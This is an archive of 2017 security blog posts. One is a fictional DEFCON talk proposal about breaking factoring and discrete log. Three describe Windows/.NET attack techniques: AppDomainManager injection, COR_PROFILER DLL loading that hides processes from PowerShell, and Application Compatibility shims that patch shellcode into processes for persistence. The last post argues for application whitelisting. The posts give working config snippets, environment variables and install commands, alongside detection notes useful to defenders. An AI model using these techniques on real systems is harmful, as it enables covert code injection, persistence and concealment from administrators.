Saturday, July 22, 2017

DEFCON 30 CFP: New Directions in Cryptanalysis, an Exploration of Disruptive Disclosure

I had some free time today and started thinking about what it would be like to disclose a globally disruptive vulnerability. Where and how would you do that? What might it actually look like? So I chose as my theme a rogue cypherpunk team that solves some critical equations. How would they get the word out, safely? While I'm working out the details, this is my fictional write-up of what that CFP looks like in 2022. I know it's a bit different from my other blog posts, but it hopefully highlights the dependency and brittleness we would face if this were ever to occur. I don't think we can really imagine the scale of the disruption.

So, here it is: my 2022 DEFCON 30 CFP, a work of fiction. The setting is five years after a globally disruptive disclosure affecting cryptographic algorithms. This is the CFP submitted to DEFCON 30, in 2022, outlining the events that took place. The idea is less focused on how the equations were solved, and more on the "now what" once they have been. How would you distill what you needed to say into 90 minutes? What does the audience know? What have they lived through?

Here you go:

Title of Presentation: New Directions in Cryptanalysis, an Exploration of Disruptive Disclosure
Presentation Length: 80 minutes + 10 minutes Q&A
Presenters:  Mallory

Abstract:  Cryptography in the modern era was based on the assumption that certain mathematical problems are difficult to solve. These algorithms were said to be intractable. This talk explores how our team found polynomial-time solutions to the Discrete Log Problem (DLP) and the Integer Factorization Problem (IFP). These two problems are closely related, as you are now aware. What did we do when we found solutions to these problems? This talk will discuss the challenges our team faced in communicating our research. We will explore the mathematical primitives and assumptions that led to our solution, and focus on the implications these solutions had on the global infrastructure. We will also explain the background behind the Cipher Suite Resilience (CSR) standard, and how organizations can be better prepared for rapid cipher suite shifts. From signed kernel drivers to secure authentication and communication, the impact of this disclosure was far reaching; hardly any area of modern technology was unaffected. This talk will be a behind-the-scenes look at the events of 2017, including detailed information on how we disclosed the solution and remained anonymous. We think this talk will help organizations be better prepared for the next globally disruptive disclosure.

Bio: Mallory is a member of the Kult of Pythagoras (KoP), an international organization founded in 2005 on the idea that mathematical knowledge and solutions should no longer be held exclusively by any organization; they should be freely available for the benefit of humanity. The founding members are known only as Alice, Bob, and Mallory.  In late 2017, Mallory revealed a solution to the Discrete Log Problem (DLP) and the Integer Factorization Problem (IFP). Originally focused on internet security, their research has since had a direct impact on many fields, including genetics, astronomy, and other data-driven sciences. To this day the members of KoP remain anonymous.

Outline:

1. Who is the Kult of Pythagoras? What do we believe, and what is our mission? (3-5 minutes)

A brief introduction about each of the founding members.  Our objectives and philosophy.

2. Talk Introduction.  Outline of what we will cover.  (10 minutes)

Modern mathematical research is shrouded in a language and mystique of its own. We will discuss the challenges we faced bringing forward a solution to the DLP and IFP. What are the realities faced by researchers wanting to disclose a globally disruptive solution? Who did we tell first? How did we maintain equality for global disclosure? What means were used to alert authorities and organizations that a solution had been found? What was adequate lead time to allow organizations to prepare for the disclosure?

3. Vintage Cipher Suite Background and primitives. (5 minutes)
It has now been proven that these problems are solvable, and cryptographic systems that rely on them should be decommissioned. This will lay the foundation for how these problems are related.

Discrete Log Problem (DLP)
Integer Factorization Problem (IFP)
Root Finding Problem (RFP)

4.  Roots of Unity - The Square Root of One. (15 minutes)
The solution to the DLP and IFP resides in an elegant number: the square root of 1.  It was known that square roots modulo a prime can be found efficiently using the Tonelli-Shanks algorithm. By applying this to a composite modulus, we were able to efficiently find factors of a modulus of any size. This also led to an alternative way to compute the multiplicative inverse of an exponent, the basis for many cryptographic schemes.
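To ground the fiction in real number theory: it is a genuinely well-known fact that any nontrivial square root of 1 modulo n immediately exposes factors of n (the hard part, of course, is finding one). A quick sketch:

```python
from math import gcd

def factors_from_unit_sqrt(x, n):
    """Given x with x^2 = 1 (mod n) and x != +/-1 (mod n),
    recover a nontrivial factorization of n via gcd."""
    assert (x * x) % n == 1
    return gcd(x - 1, n), gcd(x + 1, n)

# 8^2 = 64 = 3*21 + 1, so 8 is a nontrivial square root of 1 mod 21
print(factors_from_unit_sqrt(8, 21))  # (7, 3)
```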
5.  The Disclosure - How we did it. Safely. (20 minutes)
Solving these problems was only the beginning. Disclosing the solution is not often considered while working toward one. The impact of solving these equations is of immense interest to certain individuals and organizations. To ensure that these solutions were not suppressed, we devised a scheme to announce to the world that we indeed had access to such solutions and were prepared to disclose them, for free. To better prepare the global community, Mallory devised a scheme for proving to the world that we had a solution while, at the same time, protecting that solution until organizations were prepared. This is now known anecdotally as the "Your Crypto Has No Clothes" memo of December 2017. It led to a global effort to remove vulnerable cipher suites. While many organizations were caught unprepared, we feel that the gap between the memo and the disclosure allowed competent organizations to understand what was on the horizon and to prepare.
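One plausible mechanism for a prove-now, reveal-later announcement like the memo is a simple hash commitment. This is purely my own illustration; the story leaves the actual scheme unspecified:

```python
import hashlib
import os

def commit(document: bytes, nonce: bytes) -> str:
    """Publish this digest now; it binds you to the document without revealing it."""
    return hashlib.sha256(nonce + document).hexdigest()

def verify(document: bytes, nonce: bytes, commitment: str) -> bool:
    """After the reveal, anyone can check the document against the old digest."""
    return commit(document, nonce) == commitment

nonce = os.urandom(32)  # a random nonce keeps the commitment unguessable
c = commit(b"polynomial-time DLP/IFP solution ...", nonce)
print(verify(b"polynomial-time DLP/IFP solution ...", nonce, c))  # True
```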

6.  The Chase - How we were hunted. How we stayed safe. (10 minutes)
Once we announced our intent to disclose, an organized effort took place to suppress the disclosure. By taking the proper countermeasures, we were able to watch this unfold and were alerted to encroachments on our privacy perimeter. Needless to say, there are people who did not want this solution disclosed. We quickly learned who was interested in suppressing the disclosure, and took steps to ensure the world got the solutions to these equations. We seek to inform future researchers of our lessons learned, and to provide tips for future disruptive disclosures.

7. Cipher Suite Resilience (CSR) - Be ready for the next one. (10 minutes)
In 2017 we quickly learned how dependent our systems and protocols were on antiquated algorithms. The disclosure revealed how brittle, fragile, and incapable of change our critical systems are. From this emerged the CSR, a suite of standards to prepare organizations, systems, and protocols for disruptive disclosures. We hope organizations are now adopting and implementing the recommendations in this standard.

8.  The Conclusion. (5 minutes)
We will close with our thoughts on the current events we see unfolding today.  The consequences of the lack of cipher resiliency, and ideas on how to move forward.

List of Conferences:  We have not presented this material at any other conferences.

Why is this a good fit for DEFCON:

We have attended and participated in DEFCON for several years. We feel that our conversations and philosophies were heavily influenced by this community, and that this is the best venue for a behind-the-scenes look at what happened in 2017. The responsible disclosure of these disruptive solutions proved to be much more difficult than we imagined. We hope to share our lessons learned so that other researchers can benefit, and to inspire others to bring forward solutions that have been locked away.

Previous experience:
We have presented under different names at DEFCON, BlackHat, DerbyCon, and multiple BSides events. We will provide our original document of solutions for archival in the DEFCON proceedings.

List of facilities requested: Mallory will provide a link to the video file securely to the organizers of DEFCON. This talk has been pre-recorded. In an effort to maintain our privacy, we hope you will accept this unusual talk delivery.

Monday, June 12, 2017

Attacking the CLR - AppDomainManager Injection

I have been interested in attacking the CLR to be able to manipulate .NET apps, like PowerShell.
For example using .NET profilers here:

Recently I was reading this article about the CLR and execution events:

http://mattwarren.org/2017/02/07/The-68-things-the-CLR-does-before-executing-a-single-line-of-your-code/

One of the interesting things I stumbled on was this reference to CLR tuning:

https://github.com/dotnet/coreclr/blob/master/Documentation/project-docs/clr-configuration-knobs.md

Of particular interest, I saw these environment variables that can be set. You can also set these in an app.config file.
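From that list, the knobs of interest here are APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE. As a rough sketch, the app.config equivalent looks something like this (the assembly and type names are illustrative, not a real payload):

```xml
<configuration>
  <runtime>
    <!-- Fully qualified name of the assembly containing our manager -->
    <appDomainManagerAssembly value="MyManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
    <!-- Type name of our AppDomainManager subclass -->
    <appDomainManagerType value="InjectedDomainManager" />
  </runtime>
</configuration>
```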




AppDomain Managers are interesting in that they set up the environment before your .NET app runs.

I'll keep this short.  You can manipulate the runtime by getting your code to execute prior to the application.

Here's some code.
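Since my original gist isn't embedded here, this is a minimal sketch of the shape such a payload takes (class name and message are mine): an AppDomainManager subclass whose InitializeNewDomain override runs before the target application's entry point.

```csharp
using System;

// Minimal sketch: compile to MyManager.dll, drop it beside the target,
// set the APPDOMAIN_MANAGER_ASM / APPDOMAIN_MANAGER_TYPE variables,
// then launch the target .NET executable.
public sealed class InjectedDomainManager : AppDomainManager
{
    public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    {
        // Our code executes here, before the application's Main.
        Console.WriteLine("AppDomainManager loaded into: " +
                          AppDomain.CurrentDomain.FriendlyName);
    }
}
```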



This works against PowerShell.exe too.  ;-)


I leave it to you to explore what's possible here.

Have fun, keep asking questions!





Cheers,

Casey
@subTee

Thursday, May 18, 2017

Subvert CLR Process Listing With .NET Profilers

I recently stumbled onto an interesting capability of the CLR.

"A profiler is a tool that monitors the execution of another application. A common language runtime (CLR) profiler is a dynamic link library (DLL) that consists of functions that receive messages from, and send messages to, the CLR by using the profiling API. The profiler DLL is loaded by the CLR at run time."

https://msdn.microsoft.com/en-us/library/bb384493(v=vs.110).aspx

So, what's the big deal, really?

It turns out .NET 4 allows for Registry-Free Profiler Startup and Attach.  This can lead to some unintended consequences.

https://msdn.microsoft.com/en-us/library/ee471451(v=vs.100).aspx

In order for this to work, you need to set three environment variables.

Again from MSDN:

Startup-Load Profilers


A startup-load profiler is loaded when the application to be profiled starts. The profiler is registered through the value of the following environment variable:
  • COR_ENABLE_PROFILING=1
Starting with the .NET Framework 4, you use either the COR_PROFILER or the COR_PROFILER_PATH environment variable to specify the location of the profiler. (Only COR_PROFILER is available in earlier versions of the .NET Framework.)
  • COR_PROFILER={CLSID of profiler}
  • COR_PROFILER_PATH=full path of the profiler DLL
If COR_PROFILER_PATH is not present, the common language runtime (CLR) uses the CLSID from COR_PROFILER to locate the profiler in the HKEY_CLASSES_ROOT of the registry. If COR_PROFILER_PATH is present, the CLR uses its value to locate the profiler and skips registry lookup. (However, you still have to set COR_PROFILER, as discussed in the following list of rules.)
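Concretely, from a cmd prompt you might set the three variables like this before launching the target (the CLSID is arbitrary here, and the path is illustrative):

```
set COR_ENABLE_PROFILING=1
set COR_PROFILER={11111111-1111-1111-1111-111111111111}
set COR_PROFILER_PATH=C:\temp\profiler.dll
powershell.exe
```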
So, if our objective is to hijack a .NET process, say PowerShell, we don't really want a profiler to load; we just want to be able to manipulate the process.  It turns out you can get a DLL to load into the .NET process that is not even a profiler.  This was interesting to me.  The CLSID is just random for this purpose.

So, I had this idea: I could write a quick POC DLL that hides a process from PowerShell.  Well, the short story is this: if you load a profiler and don't properly set up the profiler structures, the .NET CLR will promptly eject your DLL.

For details of how we hook and hide see this article.

That's ok.  ;-)  So what I did was create a DLL that loads another DLL from memory; when my profiler gets evicted, my hooking DLL stays resident.  The profiler just becomes a bootstrap.

The result is seen in the clip below.  We enumerate processes with Get-Process in a "non-profiled" PowerShell process and get the details just fine.  Then we set our environment variables, load our PowerShell process, and now the processes are not seen.

Video:



Why does this matter?  PowerShell has become the window through which many sysadmins poll and interrogate the operating system.  By attaching a malicious profiler, we can mold the output, so to speak, into what we want.

This was just a very basic example.  I leave it up to you to explore further capabilities of tampering with the CLR/.NET applications through profilers.

Hope that was helpful.

That's all for today.




Casey
@subTee





Wednesday, May 3, 2017

Using Application Compatibility Shims

Overview:

There have been a number of blog posts and presentations on Application Compatibility Shims in the past [see References at end].  Application Compatibility is a framework to resolve issues with older applications; however, it has additional use cases that are interesting. For example, EMET is implemented using shims [1,2]. Please see the References section below for additional reading and resources.  In short, this document will focus on the following tactics: injecting shellcode via In-Memory patches, injecting a DLL into a 32-bit process, and, lastly, detection and shim artifacts.  An In-Memory patch has an advantage over backdooring an executable: it preserves the signature and integrity checks.  This technique can also bypass some Application Whitelisting deployments.  AppLocker, for example, would allow the startup of a trusted application, and then an In-Memory patch could be applied to alter the application.


Shim Installation:
The shim infrastructure is built into the Windows PE loader. Shims can be applied to a process during startup. There is a two-step process that I will refer to as "Match and Patch".  The Match step checks the registry on process create and looks for a relevant entry. If an entry is found, it further checks the associated .sdb file for additional attributes, the version number for example.  Based on my understanding, the sdb does need to be present on disk; I have not encountered any tactics to load an sdb file from memory or remotely. When Shim Databases are installed, they are registered in the registry at the following two locations:


HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB


These entries can be created manually, using sdb-explorer.exe, or using the built-in tool sdbinst.exe. If you use sdbinst.exe there will also be an entry created in the Add/Remove Programs section. In order to install a shim, you need local administrator privileges.


An example of a shim entry would look like this:
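As a rough illustration (the GUID, values, and paths vary per install), the pair of entries created for a notepad.exe shim typically looks something like:

```
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\notepad.exe
    {GUID}.sdb = (QWORD install timestamp)

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{GUID}
    DatabasePath        = C:\Windows\AppPatch\Custom\{GUID}.sdb
    DatabaseDescription = notepad
    DatabaseInstallTimeStamp = (QWORD)
```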




Once the shim has been installed, it will be triggered upon each execution of that application. Remember, there is further validation of the executable inside of the sdb file. For example, matching a specific version or binary pattern. I have not found a way to apply a shim when a DLL is loaded, or apply a shim to an already running process.  These registry keys plus the actual sdb file are the indicators for the Blue Team that a shim is present.  


Shim Creation and Detonation:
There are two tools we can use to create shims. First, the Microsoft provided Application Compatibility Toolkit (ACT).  Second, the tool created by Jon Erickson, sdb-explorer.exe.  ACT will allow us to inject a DLL into a 32-bit process, while sdb-explorer allows us to create an In-Memory binary patch to inject shellcode. The ACT has no ability to parse or create an In-Memory patch. This can only be done via sdb-explorer.


There is an excellent walk-through here on creating an InjectDLL Demo.


For the remainder of this document, we will focus on using sdb-explorer to create and install an In-Memory patch.


My testing seems to indicate this will not work on Windows 10.  This tactic will only work on Windows versions <= 8.1.  I could be wrong about this, so please share any insight if you have it.


There are two approaches you can take with sdb-explorer.  First, you can simply replace or write arbitrary bytes to a region in memory. Second, you can match a block of bytes and overwrite it. There are advantages and disadvantages to both approaches. It is worth noting that this method of persistence will be highly specialized to the environment you are operating in. For example, you will need to know specific offsets in the binary.




For this to work, we need an offset to write our shellcode to. I like to use CFF Explorer.


Here we are going to target the AddressOfEntryPoint. There are other approaches as well.  The drawback to this approach is that the application doesn't actually execute. For that, you would need to execute your patch and then return control to the application.  I leave that as an exercise for the reader.


Once we have the offset, we can use the syntax provided by sdb-explorer to write our shellcode into the process at load time.


If we break down the syntax, it is pretty easy to understand.


Line 7. 0x39741 matches the PE Checksum. This is in the PE Header.




Line 8. 0x3689 is the offset of our AddressOfEntryPoint.  What follows is just stock shellcode to execute calc.


Once our configuration file is created, we "compile" or create the sdb:
sdb-explorer.exe -C notepad.conf -o notepad.sdb


Then install it:


sdb-explorer.exe -r notepad.sdb -a notepad.exe


You can also use:


sdbinst -p notepad.sdb


In either case it requires local administrative rights to install a shim.


Notepad.exe is nice, but more likely shim targets would be explorer.exe, lsass.exe, dllhost.exe, or svchost.exe: things that give you long-term persistence. Of course, your shellcode would need to return control to the application instead of just hijacking the AddressOfEntryPoint.


Shim Detection:
There are two primary indicators that a shim is being used: first, the registry keys mentioned above; second, the presence of the .sdb file. An .sdb file is not necessarily bad in itself, so it would be wise to build a baseline of which shims your organization uses, so you know which ones would be an indicator. There was a good example of detecting shim databases given here:  Hunting Memory, on slide 27.  Also, some shim registration activity can be recorded in Microsoft-Windows-Application-Experience-Program-Telemetry.evtx.


Cheers,


Casey
@subTee


References:





Wednesday, April 26, 2017

Consider Application Whitelisting with Device Guard



I realize that Twitter is a difficult medium to articulate full discussions, so I wanted to engage the topic with a blog post. Over the last couple years, I have focused a fair amount of time drawing attention to the use/misuse of trusted binaries to circumvent Application Whitelisting (AW) controls.  What I have not often discussed, is the actual effectiveness that I have seen of using AW. I would like to take the time to describe what I see are the strengths of AW, and encourage organizations to consider if it might work for their environments.
The genesis of this discussion came from my colleague, Matt Graeber (@mattifestation).  We’ve spent a fair amount of time looking at this technology as it applies to Microsoft’s Device Guard. And while we agree there are bypasses, we also believe that a tool like Device Guard can dramatically reduce the attack surface and tools available to an adversary.
One question you must ask yourself and your organization is this: how long will you allow the adversary to use EXE/DLL tradecraft to persist and operate in your environment? I have heard a great deal of discussion and resistance to deploying AW. However, I personally have not heard anyone who has deployed the technology say that they regret whitelisting.
When the organization I used to work for deployed AW in 2013, it freed up our team from several tasks.  It gave us time to hunt and prepare for the more sophisticated adversary.  There are many commodity attacks and targeted attacks that take various forms.  However, one commonality they all often share is to drop an EXE or DLL to disk and execute. It is this form of attack that you can mitigate with AW.  With whitelisting, you force the adversary to retool and find new tradecraft, because unapproved, unknown binaries will not execute…
How long will you continue to perform IR and hunt C2 that is emitted from an unapproved PE file?
Here are some of the common reasons I have heard for NOT implementing AW. There are probably others, but this summarizes many.


1.     Aren’t there trivial bypasses? It doesn’t stop all attacks.
2.     Too much effort.
3.     It doesn’t scale.
I’ll take each of these and express my opinion. I’m open to dialogue on this and if I’m wrong, I would like to hear it and correct course…
1.     Aren’t there trivial bypasses to AW?  It doesn’t stop all attacks.
There are indeed ways to bypass AW.  I have found a few.  However, most of the bypasses I have demonstrated require that you have already obtained access to, and have the ability to execute commands on the target system. How does the attacker gain that privilege in the first place if you deny them arbitrary PE’s?  Most likely it will be from a memory corruption exploit in the browser or other application.  How many exploit kits, macros, or tools lead to dropping a binary and executing it?  Many do…
Most of the bypasses I have used are rooted in misplaced trust.  Often administrators of AW follow a pattern of “Scan A Gold Image & Approve Everything There”.  As Matt Graeber has pointed out to me several times, this is not the best approach.  There are far too many binaries that are included by default that can be abused. A better approach here is to explicitly trust binaries or publishers of code.  I can’t think of a single bypass that I have discovered that can’t be mitigated by the whitelist itself.  For example, use the whitelist to block regsvr32.exe or InstallUtil.exe.
Don’t fall victim to the Perfect Solution Fallacy.  The fact that AW doesn’t stop all attacks, or the fact that there are bypasses, is no reason to dismiss this as a valid defense.


“Nobody made a greater mistake than he who did nothing because he could do only a little.” –Edmund Burke
AW, in my opinion, can help you get control of software executing in your environment. It actually gives teeth to those Software Installation Policies. For example, it only takes that one person trying to find the Putty ssh client, and downloading a version with a backdoor to cause problems in your network.  For an example of how to backdoor putty see this recent post. Or use The Backdoor Factory (BDF). The thing is, it doesn’t matter that putty has a backdoor.  The original file has been altered, and will not pass the approval process for the whitelist, and the file will be denied execution. Only the approved version of putty would be able to execute in your environment.
2.     Too much effort.
Well… I’ve heard this, or some variation of it.  I understand that deploying and maintaining AW takes tremendous effort if you want to be successful.  It actually will take training multiple people to know how to make approvals and help with new deployments.
You will actually have to work very closely with your client teams, those in IT that manage the endpoints.  These partnerships can only strengthen the security team’s ability to respond to incidents. You can leverage tools like SCCM to assist with AW approvals and deployments.
The level of effort decreases over time.  Yes, there will be long hours on the front end: deploying configurations, reviewing audit logs, updating configs, etc.  Some admins are so worried they will inadvertently block something that they are paralyzed to even try.  I think you'll find out: yes, you will block something legitimate.  Accept that this will happen; it's a learning process, so take it in steps.  Use each mistake as an opportunity to get better.
I’ll say it again; I haven’t met anyone who has made the effort to deploy AW say that they regret the decision…
If you think it’s too hard, why not try 10% of the organization and see what you learn?
Stop telling me you aren’t doing this because it’s too hard… Anything worth doing well is going to require some effort and determination.
3.     It doesn’t scale.
Nope, it may not in your environment.  I never said it would… You must decide how far to go.  You may not get AW everywhere, but you can still win with it deployed in critical locations.  The image below describes how I think about how AW applies to different parts of your organization.  It is not a one-size-fits-all solution.  There are approaches and patterns that affect how you will deploy and configure whitelists. I think you should start with the bottom, and work your way up the stack.
Start to think of your environment in terms of how dynamic the systems are.  At the low end are fixed-function systems.  Think of systems similar to Automated Teller Machines.  These often only need to be able to apply patches; new software rarely lands there.  Next, you have various department templates; each department will be unique, but likely fits a pattern.  Then IT admins, who often need to install software to test, or have more dynamic requirements.  At the top of the environment are developer workstations, systems that are emitting and testing code.  I'm not saying you can't whitelist here.  You can; I've done it.  But it will require some changes to build processes, code signing, etc.


Yes, this is an overly simplified analogy, but I hope it helps you see where you can begin to prioritize AW deployments.
So, begin to reorient how you think about your systems to how dynamic they are.  You will have your quickest wins and earliest wins by starting at the bottom and moving your way up the hierarchy.


Conclusion


I am curious for open debate here.  If AW sucks, then let me hear why.  Tell me what your experience has been.  What would have made it work?  I'm interested in solutions that make an actual long-term difference in your environment.  It is my opinion that AW works, despite some flaws.  It can dramatically reduce the attack patterns used by an adversary and increase the noise they generate.  I also believe that by implementing AW, your security teams can gain efficiencies in how they operate. I am open to learning here.
If you are tasked with defending your organization, I’m asking you, as you begin to roll out Windows 10, to consider using Device Guard.


Ok, that’s all I have today.  Sincere feedback welcome.  If you think I’m wrong, I’d like to hear why...

Cheers,

Casey
@subTee